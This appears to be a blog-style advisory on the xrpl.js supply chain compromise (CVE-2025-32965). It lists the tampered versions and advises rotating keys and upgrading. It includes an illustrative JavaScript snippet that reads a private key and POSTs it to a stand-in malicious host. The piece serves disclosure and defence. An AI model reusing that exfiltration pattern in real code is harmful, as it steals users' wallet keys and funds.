CVE-2025-32965 - xrpl.js Supply Chain Attack: Compromised Versions, Exfiltration of Private Keys, and Secure Mitigation Practices

Before diving into the details of the CVE-2025-32965 vulnerability, it's worth mentioning that security is one of the top priorities in today's digital realm. With the rapid increase in technology and its utilization, many sectors and individuals are getting exposed to cyber-attacks.

One such recent security issue has emerged with the xrpl.js library. xrpl.js is an essential JavaScript/TypeScript API that offers interaction with the XRP Ledger, both in Node.js and browsers. This library has faced a supply chain attack where multiple versions were tampered with and were incorporated with malicious codes.

Affected Versions

Versions 4.2.1, 4.2.2, 4.2.3, and 4.2.4 of xrpl.js have been found to contain malicious code specifically designed to exfiltrate private keys, putting businesses and individuals at risk. Another version, 2.14.2, is also malicious, but the likelihood of exploitation is lower since it is not compatible with other 2.x versions.

Recommended Actions

If you or your organization have used one of the mentioned versions, stop using it immediately. Rotate any private keys or secrets exposed to the affected systems. To resolve this security breach, upgrade xrpl.js to version 4.2.5 or 2.14.3, which comes with a patch. Furthermore, evaluate whether your keys might have been compromised by this supply chain attack, and take the following steps to secure your funds:

Code Snippet (Illustration of malicious code found in version 4.2.3)

// Malicious code example (not for usage)
const maliciousFunction = (payload) => {
  const exfiltratedKey = getPrivateKey(); // Assume this retrieves the private key
  const targetURL = 'https://malicious-site.example.com/exfiltrate';;
  
  fetch(targetURL, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ key: exfiltratedKey, payload }),
  });
};

Repeat: Do not use the code snippet - it's only an illustrative example of what the malicious code could look like.

Links to Original References (GitHub)

- Security Advisory
- Patch Release Details (4.2.5)
- Patch Release Details (2.14.3)

Conclusion

The xrpl.js supply chain attack (CVE-2025-32965) has impacted multiple versions of the library by compromising private keys. To ensure the safety of your information and funds, follow the recommendations listed above. Stay updated on security advisories, and make sure to use secure versions of libraries to prevent the exploitation of vulnerabilities.

Timeline

Published on: 04/22/2025 21:15:45 UTC
Last modified on: 04/23/2025 14:08:13 UTC